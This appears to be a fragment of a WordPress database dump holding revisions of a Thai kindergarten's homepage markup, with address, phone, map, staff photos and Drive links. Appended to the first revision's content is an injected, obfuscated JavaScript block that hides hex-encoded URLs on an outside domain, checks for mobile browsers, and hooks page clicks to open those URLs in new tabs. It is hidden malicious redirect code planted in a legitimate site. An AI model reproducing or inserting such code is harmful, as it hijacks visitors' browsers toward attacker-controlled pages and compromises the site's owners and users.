มายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:05:47','2025-07-15 09:05:47','',19,'http://watprato.ssk.in.th/?p=704',0,'revision','',0),
(705,1,'2025-07-15 16:06:29','2025-07-15 09:06:29','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" 